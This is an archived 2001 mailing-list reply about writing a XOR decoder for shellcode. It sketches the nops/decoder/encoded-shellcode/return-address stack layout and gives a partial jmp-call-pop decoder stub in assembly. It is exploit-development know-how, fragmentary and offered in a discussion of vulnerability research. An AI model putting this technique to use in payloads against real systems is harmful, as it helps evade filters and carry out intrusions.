Vulnerability Development: Re: xor encoding / decoding of shellcode

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Vulnerability Development mailing list archives

Re: xor encoding / decoding of shellcode

From: blitzkrieg <nyse () inwind it>
Date: Wed, 28 Nov 2001 20:22:09 +0100

On Wed, Nov 28, 2001 at 12:31:54PM -0500, KF wrote:

with null. I have been trying 
to figure out how the stack needs to be layed out in order for me to xor
encode / decode my shellcode. 
I imagine it is similar to <nops><xor decoder><xor encoded
shellcode><return addy>. At the moment 
I am stuck on how to place a xor encoded string on the stack and then
use it as executable code. 
In essence I need to learn how to write a xor decoder does anyone have
any tips on this technique?


Perhaps I'm going wrong... but in AT&T syntax you can try something
like this. I think on ppc is the same
        
        [...]
        jmp     encoded
decoder:
        pop     %esi
        [...]
        xorl    yourkey, 0xYY(%esi)     # where YY is the offset of the
                                        # words that you've encoded
        [...]
        jmp     shellcode
encoded:
        call    decoder
shellcode:      
        [...]
        your shellcode
        [...]

bye bye
                                --blitzkrieg

By Date By Thread

Current thread:

xor encoding / decoding of shellcode KF (Nov 28)
- Re: xor encoding / decoding of shellcode Ryan Permeh (Nov 28)
- Re: xor encoding / decoding of shellcode blitzkrieg (Nov 28)
- Message not available
  - Message not available
    - Re: ppc asm KF (Nov 29)